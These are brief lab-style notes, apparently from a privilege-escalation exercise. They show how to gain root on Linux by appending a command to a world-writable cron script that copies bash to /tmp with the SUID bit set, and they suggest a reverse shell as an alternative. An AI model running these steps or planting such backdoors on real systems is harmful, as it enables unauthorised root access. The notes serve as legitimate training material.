how to find:
cat /etc/crontabcheck file permissions on the every minute files:
ls -la /usr/local/bin/overwrite.sh
we have read write perms, with no execute perms. But because it’s in Cron and executes every x amount of minutes, we can still run it!.
this is what that file does:
ideally, if you can overwrite, you should be overwriting that file (overwrite.sh) with a reverse shell!
we’re just escalating:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.shstrings or cat again to make sure we correctly edited the file:
strings /usr/local/bin/overwrite.sh
check if its updated:
ls -la /tmpyes we have!
/tmp/bash -pwe have root!
